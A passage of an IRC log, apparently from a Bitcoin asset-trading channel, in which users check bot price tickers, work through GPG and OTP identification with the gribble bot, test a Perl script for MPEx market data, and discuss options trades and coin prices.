/ 0.00547927 / 0.006225 (500573 shares, 2,742.78 BTC), 30D: 0.00300001 / 0.00616216 / 0.0069 (3735257 shares, 23,017.26 BTC) Mar 10 02:34:27 ;;ident Mar 10 02:34:28 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:34:32 awesome Mar 10 02:35:02 [HAVELOCK] [SDICE] 2 @ 0.5949999 = 1.19 BTC [-] Mar 10 02:35:03 got the mirc script to work Mar 10 02:38:35 wd Mar 10 02:38:49 whats the price for asicminer today fokes? Mar 10 02:39:33 !ticker btct asicminer-pt Mar 10 02:39:35 [BTCT:ASICMINER-PT] 1D: 0.7 / 0.91596 / 1 (156 shares, 142.9 BTC), 7D: 0.65 / 0.68597 / 1 (1171 shares, 803.3 BTC), 30D: 0.65 / 0.68597 / 1 (1171 shares, 803.3 BTC) Mar 10 02:39:52 ;;ident Mar 10 02:39:52 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:40:03 thanks mircea Mar 10 02:41:42 !ticker m p750t Mar 10 02:41:43 [MPEX:O.BTCUSD.P750T] 1D: 0.89918038 / 0.90051586 / 0.90144085 (2375 shares, 2,138.73 BTC), 7D: 0.85433966 / 0.9786482 / 1.12260046 (23750 shares, 23,242.89 BTC), 30D: 0.85433966 / 1.06533167 / 1.53153505 (28750 shares, 30,628.29 BTC) Mar 10 02:41:46 aaa kickass Mar 10 02:42:14 !ticker m asicminer Mar 10 02:42:15 You know, I've had it up to here with this Indian malarkey. Mar 10 02:42:32 !ticker m asicminer-pt Mar 10 02:42:33 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Mar 10 02:43:30 !ticker btct asic Mar 10 02:43:31 The eagle never lost so much time as when he submitted to learn from the crow. Mar 10 02:43:33 !ticker btct asicmin Mar 10 02:43:35 You had the last Philistine. This one's mine. Mar 10 02:43:39 !ticker btct asicminer-pt Mar 10 02:43:41 [BTCT:ASICMINER-PT] 1D: 0.7 / 0.91596 / 1 (156 shares, 142.9 BTC), 7D: 0.65 / 0.68597 / 1 (1171 shares, 803.3 BTC), 30D: 0.65 / 0.68597 / 1 (1171 shares, 803.3 BTC) Mar 10 02:44:15 hi Mar 10 02:44:36 selling my asicminer shares for 1.8 each Mar 10 02:44:39 i'm out Mar 10 02:45:00 ;;ident Mar 10 02:45:02 You are not identified. Mar 10 02:45:09 ;;ident Mar 10 02:45:09 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:45:16 What is asicminer paying per dividend Mar 10 02:45:53 like 0.019 last one iirc Mar 10 02:46:29 hmmm this is weird Mar 10 02:47:03 if you look my other nick Mar 10 02:47:06 mjr_ Mar 10 02:47:18 you can see i have identified as Josh_Rossi Mar 10 02:47:31 Josh_Rossi gribble doens't go by nickserv accounts Mar 10 02:47:34 it just looks at the user. Mar 10 02:47:48 ah ok Mar 10 02:47:56 so it has to see Josh_Rossi Mar 10 02:48:02 yes. Mar 10 02:48:03 in order to identify me? Mar 10 02:48:08 no Mar 10 02:48:10 aha Mar 10 02:48:23 if you identify as Josh_Rossi from any account Mar 10 02:48:23 Facepalmdeskfloor Mar 10 02:48:33 it will keep track of that name you identified from. Mar 10 02:48:55 so mjr can identify as Josh_Rossi and for gribble mjr will be Josh_Rossi for as long as mjr doesn't part. Mar 10 02:49:27 ok Mar 10 02:49:54 going to be hard to get an ident script working with my phone Mar 10 02:50:07 ;;eightball ian Mar 10 02:50:07 Obviously. Mar 10 02:50:14 hes a scammer Mar 10 02:50:18 eight ball says so lol Mar 10 02:50:26 lol Mar 10 02:51:21 so basically how it works is that NickServe and gribble BOTH maintain separate identity for a given user Mar 10 02:51:34 ;;ident Mar 10 02:51:34 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:51:42 Josh_Rossi exactly. Mar 10 02:51:58 hmmm Mar 10 02:52:13 ;;eightball is Ian Bakewell a scammer? Mar 10 02:52:13 _I_ don't know. Mar 10 02:52:15 Mhm Mar 10 02:52:48 We will test eightball's honesty Mar 10 02:53:00 ;;eightball Did I play with myself lastnight? Mar 10 02:53:00 Naturally. Mar 10 02:53:05 Fuck. He's legit Mar 10 02:53:19 ;;ident Mar 10 02:53:19 You are not identified. Mar 10 02:53:23 ;;ident Mar 10 02:53:24 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:53:48 well that didn't work Mar 10 02:54:05 [MPEX] [O.BTCUSD.C470T] 1000 @ 0.18345453 = 183.4545 BTC [+] Mar 10 02:54:33 $vwap Mar 10 02:54:36 BitOTTer983: http://pastebin.com/dS1nAB1R Mar 10 02:54:36 http://pastebin.com/raw.php?i=dS1nAB1R Mar 10 02:54:36 how am i supposed to decrypt my OTP from my phone...i mean i could write a program that does it, but it is tough Mar 10 02:54:52 mjr_ mod6 is working on stuff like that. Mar 10 02:55:47 yeah, i'm re-building all scripts to interact with the bots. Mar 10 02:56:33 !mp http://dpaste.com/#webpg-link Mar 10 02:56:34 Processing. Mar 10 02:56:35 Response: http://dpaste.com/1017761/plain/ Mar 10 02:56:42 and mainly what i can make work in this one is gonna go into the end thingy, whatever it becomes Mar 10 02:57:20 hmmm but i thought he was doing it for android Mar 10 02:57:31 android is a phone neh ? Mar 10 02:57:36 oh yes, of course Mar 10 02:57:37 lol, doing it for that too, but now that's gonna be all f'd up Mar 10 02:57:40 i just meant i have an iphone Mar 10 02:57:56 Ok, I finally figured it out- key managers are conflicting Mar 10 02:58:10 thanks again guys, just needed to make sure that i could ping mpexbot and get the respone and all Mar 10 02:58:12 this is funny though...to me at least Mar 10 02:58:21 ;;ident Mar 10 02:58:21 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address None Mar 10 02:58:32 ;;ident Mar 10 02:58:32 You are not identified. Mar 10 02:58:36 jborkl_ not much surprise there. Mar 10 02:59:25 No, it is not- they are a pain in the ass Mar 10 02:59:58 ok my iphone is at least jailbroken so let's see if we can get gpg :) Mar 10 03:01:35 !mp http://dpaste.com/1017771/ Mar 10 03:01:35 Processing. Mar 10 03:01:37 Response: http://dpaste.com/1017772/plain/ Mar 10 03:05:02 [MPEX] [O.BTCUSD.C470T] 316 @ 0.18372792 = 58.058 BTC [+] Mar 10 03:05:15 !ticker m ^oix Mar 10 03:05:17 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 38.36519878 / 50.18328999 / 50.5301272 (no shares, 16,402.55 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 10 03:05:23 50 again huh Mar 10 03:07:26 yep, i think that is so far the best leading indicator i've seen Mar 10 03:08:06 so, i have gpg on my iphone now Mar 10 03:08:28 !mp http://dpaste.com/1017775/ Mar 10 03:08:29 Processing. Mar 10 03:08:29 TAKE MY MONEY Mar 10 03:08:30 Response: http://dpaste.com/1017776/plain/ Mar 10 03:08:36 but i really don't want to go back and forth between a terminal window with a touchscreen and colloquy Mar 10 03:13:36 ;;ident Mar 10 03:13:37 You are not identified. Mar 10 03:13:57 ;;eauth Josh_Rossi Mar 10 03:13:58 Request successful for user Josh_Rossi, hostmask Josh_Rossi!~mjr@cpe-68-174-114-54.nyc.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/C286BB96FE9B6CD3 Mar 10 03:14:36 ok sorry guys, but after 10 mins the pastebin expires, gotta re-conn and get a fresh one Mar 10 03:14:54 im now getting back the raw vwap, just need to make sure that I'm parsing correctly as before... Mar 10 03:15:17 $vwap Mar 10 03:15:20 BitOTTer315: http://pastebin.com/ZTNPuLZJ Mar 10 03:18:42 !ticker m s.mpoe Mar 10 03:18:43 [MPEX:S.MPOE] 1D: 0.00067638 / 0.00067638 / 0.00067638 (1 shares, 0.00 BTC), 7D: 0.00067334 / 0.00074892 / 0.00078628 (10680545 shares, 7,998.94 BTC), 30D: 0.0006153 / 0.00068474 / 0.00078628 (58685013 shares, 40,184.02 BTC) Mar 10 03:19:54 mod6 nothing to be sorry about lol Mar 10 03:21:10 in other news, the #bitcoin-assets log for this current month (9 days!) is over 1mb Mar 10 03:21:43 !mp http://dpaste.com/1017790/ Mar 10 03:21:43 Processing. Mar 10 03:21:45 Response: http://dpaste.com/1017791/plain/ Mar 10 03:23:34 mircea_popescu: i just feel bad for the conn/dis-conns Mar 10 03:23:38 but check it out ;) Mar 10 03:23:39 http://dpaste.com/1017793/ Mar 10 03:23:47 she works Mar 10 03:24:02 a cool Mar 10 03:27:00 ok one more quick test, i'll check a different MPSIC Mar 10 03:27:43 $vwap Mar 10 03:27:45 BitOTTer509: http://pastebin.com/PXDfa3ar Mar 10 03:28:02 [HAVELOCK] [HIM] 1 @ 1.7 BTC [+] Mar 10 03:28:22 ok works pretty decent, a good rough start: http://dpaste.com/1017798/ Mar 10 03:28:42 i tell you this shit's pretty exciting Mar 10 03:28:51 challenge brings innovation, as they say Mar 10 03:29:01 ddos is one of the better things that happened to mpex so far Mar 10 03:29:09 incredible huh. Mar 10 03:30:39 its amazing Mar 10 03:30:53 this is the future Mar 10 03:31:08 =) Mar 10 03:31:11 good designs well administered shall prevail Mar 10 03:32:08 ok i cleaned that up, now i gotta do one more test then i can check it into github for yall Mar 10 03:32:24 What do you guys think of google glasses Mar 10 03:32:25 (just vwap is finished for now, will finish others over next few days...) Mar 10 03:33:01 $vwap Mar 10 03:33:04 BitOTTer578: http://pastebin.com/xBthcKyb Mar 10 03:33:42 this kinda reminds me of an xkcd... http://xkcd.com/504/ Mar 10 03:34:59 ;;ticker Mar 10 03:34:59 BTCUSD ticker | Best bid: 47.54224, Best ask: 47.89850, Bid-ask spread: 0.35626, Last trade: 47.89858, 24 hour volume: 46494.02049522, 24 hour low: 43.41100, 24 hour high: 47.89860, 24 hour vwap: 45.71103 Mar 10 03:35:06 ... Mar 10 03:35:07 wtf is this Mar 10 03:35:14 Weekend rally Mar 10 03:35:26 What vodoo is this Mar 10 03:35:38 http://xkcd.com/1181/ or this one LOL Mar 10 03:35:47 i know, i was hoping for a dip Mar 10 03:38:09 where's the coinlab pr spam with "mpex indomitable, btc surges" Mar 10 03:41:16 ok, the vwap one is finished (for the moment) and checked in: https://github.com/modsix/bitotter_perl/blob/master/bitotter_vwap.pl Mar 10 03:41:29 hmmm Mar 10 03:41:41 anyway, im ciked that was so simple. can't do more must find a cold pizza to eat somewherez! Mar 10 03:41:46 just realized that now mpex is only for mpex registered people... Mar 10 03:41:56 ouch Mar 10 03:42:01 dat fee Mar 10 03:42:04 mjr_ that was always the case ?! Mar 10 03:42:07 from market data perspective i mean Mar 10 03:42:24 why ? Mar 10 03:42:40 do the other commands not come encrypted? Mar 10 03:42:46 hold on i am gonna try it out Mar 10 03:42:52 nope Mar 10 03:42:53 plaintext Mar 10 03:42:56 $depth Mar 10 03:42:57 oh ok cool Mar 10 03:42:59 mircea_popescu: http://pastebin.com/RCZCr6Uk Mar 10 03:44:18 !help Mar 10 03:44:19 List of commands: Mar 10 03:44:20 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 03:44:21 !mp (desc: returns the response from MPEX order) Mar 10 03:44:29 [MPEX] [S.MPOE] 2000 @ 0.00074997 = 1.4999 BTC [+] Mar 10 03:44:40 [MPEX] [S.MPOE] 27999 @ 0.00074998 = 20.9987 BTC [+] Mar 10 03:44:41 mircea_popescu: what commands are available for the mpexbot? Mar 10 03:44:42 [MPEX] [S.MPOE] 40000 @ 0.00074999 = 29.9996 BTC [+] Mar 10 03:44:44 [MPEX] [S.MPOE] 19317 @ 0.00075 = 14.4878 BTC [+] Mar 10 03:45:02 benkay $post $depth $vwap Mar 10 03:45:05 thank you. Mar 10 03:45:05 ah very cool Mar 10 03:45:15 $vwap Mar 10 03:45:17 benkay: http://pastebin.com/xaBQwgvC Mar 10 03:45:33 what does vwap stand for? Mar 10 03:45:40 volume weighted average price Mar 10 03:45:41 volume weighted average price Mar 10 03:45:41 volume weighted average.. Mar 10 03:45:43 price! Mar 10 03:45:44 ha! Mar 10 03:45:45 thanks. Mar 10 03:46:39 you can also inspect these one at a time with assbot's !ticker Mar 10 03:46:48 lol, was just thinking about back in the days when we were discussing mpex fee being around $450 Mar 10 03:47:02 and just realized that it will now be around $1500 Mar 10 03:47:10 jeeze mp Mar 10 03:47:15 i always said it's only going up. Mar 10 03:47:18 hyperinflation Mar 10 03:47:23 in the usd Mar 10 03:47:32 and that is true Mar 10 03:47:33 the usual consumerist "o, i'll just wait" is suicide here. Mar 10 03:47:35 you did say that Mar 10 03:47:46 the longer one waits the more painful it gets. Mar 10 03:47:48 hmmm that is a good point Mar 10 03:48:03 https://bitcointalk.org/index.php?topic=149892.0 Mar 10 03:48:04 this is a whole new world Mar 10 03:48:11 I nominate pirateat40 for the documentary Mar 10 03:48:40 typically...if you wait, prices usually fall Mar 10 03:48:48 on most consumable things Mar 10 03:49:16 yeah. Mar 10 03:49:16 but in a bitcoin economy, the opposite may be true until you can finally do most of your transactions in bitcoin Mar 10 03:49:36 assets denominated in btc just keep increasing in price Mar 10 03:49:36 in which case you would still be paying the same 30 btc you would have before Mar 10 03:49:46 back in april 2012 when it was introduced fee was like, 100 bux irrc Mar 10 03:49:51 new metric: 1 seat mpex vs. 1 seat nyse Mar 10 03:49:59 wait for parity Mar 10 03:50:00 lol great idea Mar 10 03:50:13 totally. Mar 10 03:50:23 oh...i emailed freenode and asked if they would accept bitcoin donations Mar 10 03:50:30 they only take credit card and paypal right now Mar 10 03:50:35 yeah Mar 10 03:51:01 and i mean, it is pretty much exactly what they believe in as far as distributed systems and freedom Mar 10 03:51:01 [HAVELOCK] [HIM] 1 @ 1.7 BTC [+] Mar 10 03:51:06 ahaha somebody just pm'd me https://bitcointalk.org/index.php?topic=64962.msg773754#msg773754 Mar 10 03:52:11 where did homegirl running MPOE-PR pick up all dat econ? Mar 10 03:52:56 benkay she is ocassionally allowed a quiet seat at the board meetings. Mar 10 03:54:33 !mp http://pastebin.com/TMmbMjc3 Mar 10 03:54:33 Please use http://dpaste.com/ Mar 10 03:55:15 !mp http://dpaste.com/1017811/ Mar 10 03:55:15 Processing. Mar 10 03:55:17 Response: http://dpaste.com/1017812/plain/ Mar 10 03:56:18 mircea_popescu: preferred capitalization MPEx or MPEX? Mar 10 03:56:27 it's always been MPEx Mar 10 03:56:50 thanks. Mar 10 03:56:53 money printing exchange Mar 10 03:57:02 everyone makes money Mar 10 03:57:10 haha totally. Mar 10 03:57:30 does it it suck for people with bad calls and puts Mar 10 03:57:34 !post Mar 10 03:57:35 multi purpose excalibur Mar 10 03:57:45 $post Mar 10 03:57:46 I got a STAT from irc. officially idiot proof. Mar 10 03:57:47 benkay: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 10 03:57:48 i remember a 500 BTC squeezed out of a poor speculator Mar 10 03:57:55 from the 26 to 20 dollar flash crash Mar 10 03:57:59 hilarious Mar 10 03:58:01 Bowjob end of jan somebody got wiped for like 5k actually Mar 10 03:58:01 [HAVELOCK] [SDICE] 1 @ 0.5949999 BTC [-] Mar 10 03:58:08 yikes Mar 10 03:58:16 Buy and hold, doesnt cost a dime Mar 10 03:58:20 and it works so far Mar 10 03:58:27 i think the record is that one time when s.dice got sold to like 0.0008 Mar 10 03:58:32 oh yeah Mar 10 03:58:34 i remember that Mar 10 03:58:35 lol Mar 10 03:58:37 fat finger Mar 10 03:58:37 we mostly came to the conclusion it must have been a msitake Mar 10 03:58:44 that was an 80k USD mistake Mar 10 03:58:46 was it Mar 10 03:58:48 mircea_popescu: i'm aware of the email and irc channels for posting trades to MPEx, are there others I'm not aware of? Mar 10 03:58:53 was pretty huge. Mar 10 03:59:01 [HAVELOCK] [SDICE] 1 @ 0.595 BTC [+] Mar 10 03:59:03 benkay email is not atm such a channel. Mar 10 03:59:04 and of course this being the wild wild west of finance Mar 10 03:59:15 they cant.. they cant reverse it Mar 10 03:59:16 i had mentioned that if the worst comes to worst we will take it to email, Mar 10 03:59:18 fat finger Mar 10 03:59:20 but it hasn't come to that. Mar 10 03:59:32 thanks for the clarification. is irc then the only channel over which you're accepting transactions? Mar 10 03:59:32 ;;ticker Mar 10 03:59:33 BTCUSD ticker | Best bid: 46.95900, Best ask: 47.25000, Bid-ask spread: 0.29100, Last trade: 47.33203, 24 hour volume: 47013.01597736, 24 hour low: 43.41100, 24 hour high: 47.89860, 24 hour vwap: 45.74036 Mar 10 03:59:40 other than that there are private proxies available atm, and the public irc bots. Mar 10 04:01:03 "I wish I had bought some when they were cheap :(" - On the current events forums of gamefaqs Mar 10 04:01:07 is one more robust than the other? do you prefer to receive over irc? Mar 10 04:01:14 I was telling them about BTC since it was 13 dollars.. Mar 10 04:01:54 i woulsd guess irc is the most robust Mar 10 04:02:25 this is a difficult question tho, robust by what standard ? Mar 10 04:02:30 anything manmade is in principle doomed. Mar 10 04:02:30 fuck iono Mar 10 04:02:48 some arbitrary heuristic? Mar 10 04:03:01 your team's hunches about these things? Mar 10 04:03:17 irc is robust as long as freenode stays online. Mar 10 04:04:34 thanks again. Mar 10 04:04:42 don't mention it. Mar 10 04:08:20 yeah i think this is a great system Mar 10 04:08:27 [BTCTC] [GSDPT] 2 @ 0.0056 = 0.0112 BTC [-] Mar 10 04:11:32 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.24110904 = 241.109 BTC Mar 10 04:11:47 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.21525757 = 215.2576 BTC Mar 10 04:11:49 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.19052144 = 190.5214 BTC [-] Mar 10 04:11:53 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.16701309 = 167.0131 BTC [-] Mar 10 04:11:55 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.14485191 = 144.8519 BTC [-] Mar 10 04:14:19 hmmm Mar 10 04:14:29 i managed to import your pub key mircea Mar 10 04:14:41 still getting used to gpg Mar 10 04:17:59 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 10 04:20:30 B| Mar 10 04:21:48 cool. Mar 10 04:22:36 aand we're officially over 200k option contracts traded this month. Mar 10 04:22:45 new record. Mar 10 04:23:52 does anyone know how to type the double barred B Mar 10 04:25:46 [BTCTC] [BASIC-MINING] 15 @ 0.33318 = 4.9977 BTC [+] Mar 10 04:26:17 [BTCTC] [BASIC-MINING] 4 @ 0.33317 = 1.3327 BTC [-] Mar 10 04:27:16 [BTCTC] [COGNITIVE] 23 @ 0.21 = 4.83 BTC [+] Mar 10 04:27:39 [BTCTC] [COGNITIVE] 2 @ 0.215 = 0.43 BTC [+] Mar 10 04:28:05 [BTCTC] [COGNITIVE] 3 @ 0.22 = 0.66 BTC [+] Mar 10 04:32:33 http://i.imgur.com/j8L5hhZ.jpg Mar 10 04:32:36 Do want Mar 10 04:33:15 infinity sign is kinda unapropriate Mar 10 04:33:19 this not being fiat. Mar 10 04:33:57 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.23978602 = 239.786 BTC [-] Mar 10 04:34:00 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.21402821 = 214.0282 BTC [-] Mar 10 04:34:02 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.1893874 = 189.3874 BTC [-] Mar 10 04:34:07 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.16597581 = 165.9758 BTC [-] Mar 10 04:34:09 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.14391278 = 143.9128 BTC [-] Mar 10 04:35:45 that seem like a big deal to anyone? Mar 10 04:36:06 mpex being dos'd can be ironically considered a milestone ;-) Mar 10 04:41:18 so basically someone thinks btc will stay over 50ish Mar 10 04:41:28 and has a coupla k's to back that thinking Mar 10 04:45:47 Whhoosh Mar 10 04:48:53 ;;ticker Mar 10 04:48:56 BTCUSD ticker | Best bid: 47.53000, Best ask: 47.54224, Bid-ask spread: 0.01224, Last trade: 47.53000, 24 hour volume: 48358.44194382, 24 hour low: 43.41100, 24 hour high: 47.95000, 24 hour vwap: 45.90546 Mar 10 04:51:03 ;;eightball Will BTC rise higher this week? Mar 10 04:51:03 The answer is a resounding no. Mar 10 04:51:07 :/ Mar 10 04:51:14 Sell sell sell! Mar 10 04:53:16 Someone offered me 112 BTC for my Avalon Mar 10 04:53:17 MHmm Mar 10 04:53:31 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.23956955 = 239.5696 BTC [-] Mar 10 04:53:36 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.21382268 = 213.8227 BTC [-] Mar 10 04:53:38 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.1891934 = 189.1934 BTC [-] Mar 10 04:53:41 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.16579394 = 165.7939 BTC [-] Mar 10 04:53:49 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.14374371 = 143.7437 BTC [-] Mar 10 04:54:01 i guess it ain't gribble shorting them Mar 10 04:54:09 jeebus Mar 10 04:54:10 MadSweeney indeed. Mar 10 04:55:05 MadSweeny do people use BTC in the philippines? Mar 10 04:55:34 Bowjob, yes Mar 10 04:55:36 id imagine people earn lik 1.5 BTC for 1 month Mar 10 04:55:38 there Mar 10 04:55:54 that's too low Mar 10 04:56:07 doing what? Mar 10 04:56:12 whats the average salary there Mar 10 04:56:47 k, maybe 4 BTC im guessing Mar 10 04:56:48 just a guess Mar 10 04:56:49 lol Mar 10 05:00:26 https://i.chzbgr.com/maxW500/6988024064/h23C3D98F/ Mar 10 05:00:37 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.2390698 = 239.0698 BTC [-] Mar 10 05:00:38 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.21335791 = 213.3579 BTC [-] Mar 10 05:00:42 [MPEX] [O.BTCUSD.P510T] 1000 @ 0.18876427 = 188.7643 BTC [-] Mar 10 05:00:45 [MPEX] [O.BTCUSD.P490T] 1000 @ 0.16540104 = 165.401 BTC [-] Mar 10 05:00:48 [MPEX] [O.BTCUSD.P470T] 1000 @ 0.1433876 = 143.3876 BTC [-] Mar 10 05:01:09 hmmm Mar 10 05:01:16 that's a lot of BTC Mar 10 05:01:31 maybe they know something we don't... Mar 10 05:01:47 I havent really paid attention..what does it mean Mar 10 05:01:49 those btcs Mar 10 05:02:46 whats the oix at? Mar 10 05:02:53 those are put options Bowjob Mar 10 05:02:54 !ticker m ^oix Mar 10 05:02:55 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 40.68083871 / 49.87693675 / 50.5301272 (no shares, 17,066.74 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 10 05:03:06 50ish Mar 10 05:03:16 cool thats what i was figuring Mar 10 05:03:33 lol i just realized that i had kleopatra installed already and i was doing everything from the command line Mar 10 05:04:36 yeah i figured someone was hedging something with those Mar 10 05:05:07 all the way down to 47... Mar 10 05:05:11 if coinlab etc had a clue they could actually insure their coins Mar 10 05:05:19 so they could deliver to customers rather than cancel orders Mar 10 05:05:27 put options.. meaning they expect btc prices to go down.. to 47? Mar 10 05:05:32 past. Mar 10 05:05:35 well Mar 10 05:05:37 Bowjob nah. these were sold not bought Mar 10 05:06:01 person is basically saying "btc will stay over 50 the entire month, and maybe even over 55" Mar 10 05:06:08 purchaser? Mar 10 05:06:18 the bot bought. Mar 10 05:06:21 the customer sold. Mar 10 05:06:28 so it's a "call" then Mar 10 05:06:29 ? Mar 10 05:06:34 you can tell cause the bids were taken out not the asks Mar 10 05:06:36 no selling a put = buying a call Mar 10 05:06:37 no, it's a put. Mar 10 05:06:41 nah. Mar 10 05:06:55 if you are "short" a put Mar 10 05:07:00 it is a bullish move Mar 10 05:07:02 [HAVELOCK] [SDICE] 1 @ 0.59499999 BTC [-] Mar 10 05:07:03 [HAVELOCK] [SDICE] 9 @ 0.595 = 5.355 BTC [+] Mar 10 05:07:05 [HAVELOCK] [SDICE] 2 @ 0.599 = 1.198 BTC [+] Mar 10 05:07:11 thats true. Mar 10 05:07:29 just the net gain as a function of btc price changes Mar 10 05:07:35 so if you think something is going up you can sell puts and collect premiums and buy calls as well Mar 10 05:07:35 nice recovery on havelock Mar 10 05:07:48 i sold at 0.75, lets see what happens Mar 10 05:08:09 some people sell puts in order to buy calls (lowers their cost) Mar 10 05:08:44 yeah, that actually may work Mar 10 05:08:44 They should have taught me this in hs Mar 10 05:08:51 Bowjob absolutely. Mar 10 05:09:02 but if they taught me about this in hs, there wont be time for shakespear Mar 10 05:09:02 shit they should teach people what a debit and a credit is Mar 10 05:09:08 yeah ^ Mar 10 05:09:32 i was actually thinking about trying to create a web based class Mar 10 05:09:41 like kahn academy or something about finance Mar 10 05:09:47 thankfully, unlike most of my 20 year old contemporaries, I had this fine idea of saving more than i've been spending Mar 10 05:09:47 fuck hs Mar 10 05:09:53 well... Mar 10 05:10:00 that is a smart idea Mar 10 05:10:01 the whole education stack needs to be online Mar 10 05:10:04 and i put it in bitcoins Mar 10 05:10:07 but not when you have rampant inflation Mar 10 05:10:09 before they blew up from 13 dollars Mar 10 05:10:10 lol Mar 10 05:10:16 so in your case smart Mar 10 05:10:17 i wish i put more Mar 10 05:10:24 oh well Mar 10 05:10:34 meh Mar 10 05:10:34 and i did put in what i can lose and just write off Mar 10 05:10:37 don't fixate on short term Mar 10 05:10:37 selling asicminer shares 1.8 each get at me Mar 10 05:10:44 you're only 20 Mar 10 05:11:09 do you want to do the trading thing? Mar 10 05:11:09 mircea_popescu: what is the capital requirement for someone to sell the amount of puts we just saw Mar 10 05:11:10 [BTCTC] [ASICMINER-PT] 1 @ 0.84999 BTC [+] Mar 10 05:11:31 mhm, lets just say i'm "interested" not sure yet Mar 10 05:11:54 i'm an owl for now. just observing Mar 10 05:11:57 $depth Mar 10 05:12:01 BitOTTer906: http://pastebin.com/Hhw3k9Bi Mar 10 05:12:25 mjr_ probably about .5 btc per contract Mar 10 05:12:27 what kind of work do you do? Mar 10 05:12:33 something like 2500 per batch Mar 10 05:13:12 sorry about the in and out, but it works better now, does both depth and vwap -- its all in one code file now too. Mar 10 05:13:17 http://dpaste.com/1017874/ Mar 10 05:13:26 depth output successful Mar 10 05:13:42 is that in and out going to be a casual thing ? Mar 10 05:13:56 na, i need to figure out how to msg the bot directly :/ Mar 10 05:14:06 /msg Mar 10 05:14:14 heh, this doesn't work quite like that Mar 10 05:14:34 ok Mar 10 05:14:48 whtats the big deal, noobs join/part all da time Mar 10 05:15:28 ya but if we have 10 people using the script and all joining and parting Mar 10 05:15:31 its meh Mar 10 05:15:48 a that'd be insane Mar 10 05:15:54 im sure finished version won't be doing thatl ol Mar 10 05:16:25 ;;calc 239+213+188+165+143 Mar 10 05:16:25 948 Mar 10 05:16:35 ;;ticker Mar 10 05:16:36 BTCUSD ticker | Best bid: 47.52311, Best ask: 47.90000, Bid-ask spread: 0.37689, Last trade: 47.92886, 24 hour volume: 49410.60996836, 24 hour low: 43.41100, 24 hour high: 47.95000, 24 hour vwap: 45.95456 Mar 10 05:16:44 oh btc... are we going to 100? Mar 10 05:16:57 55 seems likely. Mar 10 05:17:11 yea 55 berfore 100 :) Mar 10 05:17:17 so, that guy just collected 948 bitcoins Mar 10 05:17:28 who? Mar 10 05:17:35 whoever sold those puts Mar 10 05:17:40 the bot bought them Mar 10 05:17:49 a Mar 10 05:18:02 [HAVELOCK] [KCIM] 1 @ 1.25 BTC [+] Mar 10 05:18:09 there were two bursts Mar 10 05:18:11 what's the equation for collateral? Mar 10 05:18:14 ;;asks 48 Mar 10 05:18:23 There are currently 3929.1374 bitcoins offered at or under 48.0 USD, worth 188482.186888 USD in total. | Data vintage: 0.0021 seconds Mar 10 05:18:34 ;;asks 50 Mar 10 05:18:34 There are currently 33194.542 bitcoins offered at or under 50.0 USD, worth 1619455.56147 USD in total. | Data vintage: 11.2957 seconds Mar 10 05:18:44 it si trhe weekend and we are trucking on up.... crazy Mar 10 05:18:51 i know Mar 10 05:19:05 s.dice is back up too Mar 10 05:19:10 mpoe is up Mar 10 05:19:20 o kinda wan t to just walk away from btc land for a month come back and see what is going on... Mar 10 05:19:34 litecoin is near 25 cents Mar 10 05:19:42 ya ltc is crazy lol Mar 10 05:19:44 i am actually trying to mine litecoin Mar 10 05:19:55 not because i particularly like them Mar 10 05:20:04 but because i can send them to btc-e Mar 10 05:20:05 many many gpu miners will mine and support ltc now asics Mar 10 05:20:23 make the network stronger:) Mar 10 05:20:29 does cpu mining still work for ltc? Mar 10 05:20:33 hahaha best Mar 10 05:20:37 lol it hasn't worked for me Mar 10 05:20:38 Stupid move on my part, I sold 10k LTC Mar 10 05:20:44 it works but like cpu mining in btc dont do it:) Mar 10 05:20:50 maybe I should buy back Mar 10 05:20:53 well...if you move them to btc-e Mar 10 05:21:01 you can get access to better prices Mar 10 05:21:08 i just don't like the other funding options Mar 10 05:21:23 to clarify: i meant you could end up with more bitcoins Mar 10 05:21:28 [MPEX] [O.BTCUSD.P550T] 1000 @ 0.23838313 = 238.3831 BTC [-] Mar 10 05:21:34 [MPEX] [O.BTCUSD.P530T] 1000 @ 0.21271752 = 212.7175 BTC [-] Mar 10 05:21:36 [MPEX] 